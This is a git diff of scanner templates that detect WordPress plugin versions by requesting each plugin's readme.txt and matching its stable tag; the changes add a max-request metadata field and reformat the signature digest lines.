b/http/technologies/wordpress/plugins/polylang.yaml index a6eed55ad9..0a4b9aee09 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022064436014aab6534f603d4f2982960dfd9458fc75d158562af8984d2984b0416902202b364c30b74645c4783c077abd0fea3439436ef8b5320b1d313ffd30fd3f1915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022064436014aab6534f603d4f2982960dfd9458fc75d158562af8984d2984b0416902202b364c30b74645c4783c077abd0fea3439436ef8b5320b1d313ffd30fd3f1915:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2d62b26097..8c4bc5dfa6 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220441e97d329af65d77e6c4d26098d0bb5bf1d6e8be59c1a5265e3bdd2c130be8d022100a0cea0a469a4265d6f183df1e2dfd56d3266fa19916ba87df6d4fa658d0134e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220441e97d329af65d77e6c4d26098d0bb5bf1d6e8be59c1a5265e3bdd2c130be8d022100a0cea0a469a4265d6f183df1e2dfd56d3266fa19916ba87df6d4fa658d0134e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 9dcb899b9c..f43338ddad 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e5caa2c52549e67f3b724b7dd8c30060262eaee02d6a640dbb19e84fa365cf5022100924bf7bdddb9b01ad3a2d8c18d1bc003b7b8cc78a9977c066c686ef31a16b82a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202e5caa2c52549e67f3b724b7dd8c30060262eaee02d6a640dbb19e84fa365cf5022100924bf7bdddb9b01ad3a2d8c18d1bc003b7b8cc78a9977c066c686ef31a16b82a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5dffb19950..630077b567 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c316891170440b15dc8551f5b9c8551bdb8bf77335de08e997da139d83eea36022100fdcd10f49845983d12ed473a8e410461b475afb5c1a16c978ff7ee67415374b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201c316891170440b15dc8551f5b9c8551bdb8bf77335de08e997da139d83eea36022100fdcd10f49845983d12ed473a8e410461b475afb5c1a16c978ff7ee67415374b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 23d0a65b35..6b352cc1ce 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f907641cd0461feb52c159826fa1dfbf873adbfd7210a5296e0b46b8cbe9192302210086c7050d4bad546a2d35098dab99bc2a99585fa3158f57b45ddfbbfff6a4f7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f907641cd0461feb52c159826fa1dfbf873adbfd7210a5296e0b46b8cbe9192302210086c7050d4bad546a2d35098dab99bc2a99585fa3158f57b45ddfbbfff6a4f7a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index b41842fd29..dbf69f2fec 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021907641e29c4b58dba730009af7a0415cf05895b5e3ea9b92eff6dd53f583aa022100818fed95ba1d30c30fc975e827ceac1bbf24f094f63f2e2fa4386bb8ee5e67d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022021907641e29c4b58dba730009af7a0415cf05895b5e3ea9b92eff6dd53f583aa022100818fed95ba1d30c30fc975e827ceac1bbf24f094f63f2e2fa4386bb8ee5e67d8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index cebb1fa1ad..cc172e7b64 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207737df68b8389ab2440d213b7f660e121b5c2616b33ff99ed23cb30fea75814a02200526231d44aed8820afb7a7e90a80a51164883a50dbf13ff8b2e6304b84279b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207737df68b8389ab2440d213b7f660e121b5c2616b33ff99ed23cb30fea75814a02200526231d44aed8820afb7a7e90a80a51164883a50dbf13ff8b2e6304b84279b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 7a084abc8d..c3f7975d0b 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e5a5c686c32f99f67dda5e48113f6669c49f1409a9c7cda64f6bc287d60b164022100e6c74fd22a394a86bd6888483fdcbfa4b11da6ca6605c58b8a9d0d65d6ebaede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206e5a5c686c32f99f67dda5e48113f6669c49f1409a9c7cda64f6bc287d60b164022100e6c74fd22a394a86bd6888483fdcbfa4b11da6ca6605c58b8a9d0d65d6ebaede:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index e6fa0699a4..fd5f9577c5 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ed8a7e17350d4a2b0ea4576ff3ace2628820e4f6513bab5fdd5e18f0b5e80e4022047f6a7d2e3f8c26d4a7545a5466a5950ef1f934b5a510c8374efe7a7f1be58e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207ed8a7e17350d4a2b0ea4576ff3ace2628820e4f6513bab5fdd5e18f0b5e80e4022047f6a7d2e3f8c26d4a7545a5466a5950ef1f934b5a510c8374efe7a7f1be58e9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 9c78cf7891..274cba2de7 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c4d3188cbe214f34a545f54d3f57e072c84dba6e11c284335e1a65f99c69f2e022100fd9cf7dde044727201adbd976a09ca4e020b6d27ba8c6cf35b55c41e71c41d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008c4d3188cbe214f34a545f54d3f57e072c84dba6e11c284335e1a65f99c69f2e022100fd9cf7dde044727201adbd976a09ca4e020b6d27ba8c6cf35b55c41e71c41d34:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index e00ba637ad..23fe82ad4e 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a4a3acb94e8c21f694cf652050fe7a5f183e0a4c18e33ff83a40c959f4452c8022100ef7a9ca8e6b8effc57f7391491aca5f031f02a199f38a4be8d8d9cfbb4b6c7f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202a4a3acb94e8c21f694cf652050fe7a5f183e0a4c18e33ff83a40c959f4452c8022100ef7a9ca8e6b8effc57f7391491aca5f031f02a199f38a4be8d8d9cfbb4b6c7f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index eba05b229c..48277900db 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b2446e445301786e8cda5e1b7b4fac86dacb0e5d0b8669602940397be330ee102210089883aa16490d28b00ae5d8c6c65ece84f8fb63f0194cc2016a3e134f1441e10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008b2446e445301786e8cda5e1b7b4fac86dacb0e5d0b8669602940397be330ee102210089883aa16490d28b00ae5d8c6c65ece84f8fb63f0194cc2016a3e134f1441e10:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 222091977c..ed6bcd4809 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220095084ead6d97ac003168787cccb95b651778889c027ce72564266a511ffe77f022070e6e4702302ee3c2cda447ade8745923adbde12e5cbb1fdd15f7721d9d1a173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220095084ead6d97ac003168787cccb95b651778889c027ce72564266a511ffe77f022070e6e4702302ee3c2cda447ade8745923adbde12e5cbb1fdd15f7721d9d1a173:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index c3b65774ab..f0c518963a 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b33d2a06bd672c3d9695d1452d856a695e356a6e9835a145f3e40582a13f50d02207817ed22c8da6c4287d75c58eaeefdb9002aba940e38a46984d9ddee4e5260a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008b33d2a06bd672c3d9695d1452d856a695e356a6e9835a145f3e40582a13f50d02207817ed22c8da6c4287d75c58eaeefdb9002aba940e38a46984d9ddee4e5260a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 269134eb59..263506ebdb 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f81dcbbff92f29994faf8d91a54fde1061414a8ffe7f48c32c7629307a6f074902205e0520e47225d9ba436e1192517adad1942ee81a9e7c4c18d604c954212c8b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f81dcbbff92f29994faf8d91a54fde1061414a8ffe7f48c32c7629307a6f074902205e0520e47225d9ba436e1192517adad1942ee81a9e7c4c18d604c954212c8b52:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index fd2d82bb2d..0e329244ac 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024b77a544921bff84dcb7d0015dc75b6292abdc16e8a9a15858928496b870b74022100849d5b51c48be8106e09ef5c91c21a2752080b37c822226c5c6eec95293d3497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022024b77a544921bff84dcb7d0015dc75b6292abdc16e8a9a15858928496b870b74022100849d5b51c48be8106e09ef5c91c21a2752080b37c822226c5c6eec95293d3497:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 4ea2f1a5e5..40f089a1b8 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202746786a013c54d196cdb9ed47e5d594febdc29514ba9d7cdbd837c1206d506b022053be488b317e0237d9947626975445f2197fd9a0403cebb6a15941474c9187d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202746786a013c54d196cdb9ed47e5d594febdc29514ba9d7cdbd837c1206d506b022053be488b317e0237d9947626975445f2197fd9a0403cebb6a15941474c9187d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 237670e78c..4d3c1dc855 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200562999ebbd37bf2d3619f7bc59a697d27c494f3207e836cafbbeb3b13702715022100f5517e7e7cf8ec77a5080d492b32b69a69ccc36f6b0aa8b8abd397de963a8e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200562999ebbd37bf2d3619f7bc59a697d27c494f3207e836cafbbeb3b13702715022100f5517e7e7cf8ec77a5080d492b32b69a69ccc36f6b0aa8b8abd397de963a8e38:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 8fa5639785..b03d5962ec 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022011630669de08df30cf328b39eb2b4bd36ba31244d195d116cebc5d04c74e15f60221008a10d1c901ba5bcd7404302648412bb75ce622954643cbdfc6cc482ea7299544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022011630669de08df30cf328b39eb2b4bd36ba31244d195d116cebc5d04c74e15f60221008a10d1c901ba5bcd7404302648412bb75ce622954643cbdfc6cc482ea7299544:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index b87cf1e0f6..a8d9525e87 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aeddcac97ba4b65efff620b6045e8642f33203d7c0a95bbf85f68e241c35aaca022100b9aa03a9d7a4b0c05f6fda40ac033c6f2054ac781fb280d1826c7f38ec0f5e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100aeddcac97ba4b65efff620b6045e8642f33203d7c0a95bbf85f68e241c35aaca022100b9aa03a9d7a4b0c05f6fda40ac033c6f2054ac781fb280d1826c7f38ec0f5e0a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 10d1787b14..987a903d8e 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0c29fbde561425303b60e0d97745d0c24b300f60f58b8177f344fe86bd5e46c022022de9125af09e219bc4bbd706c69984cb2d2ded8bc87ea449ecc2863f4c7ab03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b0c29fbde561425303b60e0d97745d0c24b300f60f58b8177f344fe86bd5e46c022022de9125af09e219bc4bbd706c69984cb2d2ded8bc87ea449ecc2863f4c7ab03:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index e08f88f9db..249a23f1d3 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ccc4570a3867dc9a15fc3cd439188a8cd5e925623aac1e657dd9f096c646f0a502207374e4433517d4caa54b01e69bad111f1500810a010fb8c23380852bda5c3b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ccc4570a3867dc9a15fc3cd439188a8cd5e925623aac1e657dd9f096c646f0a502207374e4433517d4caa54b01e69bad111f1500810a010fb8c23380852bda5c3b25:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index c919aed15b..6a9175f674 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c0d44a95130b47da84c19049a76f1c894504c5aa13b5ae6c4d8b2b4c3cb653d0220260822736e215a51be0733312b31978275a7178e4468007ad5a83178d0906a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202c0d44a95130b47da84c19049a76f1c894504c5aa13b5ae6c4d8b2b4c3cb653d0220260822736e215a51be0733312b31978275a7178e4468007ad5a83178d0906a9e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 18e13b2ebf..007ce74832 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005dc8d2b939c3e50c22177d4b58e8e292a6b075dd2c288f00ead7e3e835587380220173b71e8c394823699fa3249bb248b8580e285dc176d02bbf0b662ec96f30fba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022005dc8d2b939c3e50c22177d4b58e8e292a6b075dd2c288f00ead7e3e835587380220173b71e8c394823699fa3249bb248b8580e285dc176d02bbf0b662ec96f30fba:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 094c1a77fa..a04128a04b 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205923239d1b282ec36109c5607332d8577b680604b6eea5907b6b7e4e1f4a406b022100ba936802f9c9d4d1ebd04a5686e89be54913f4f30333267fb66389c060d5825c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 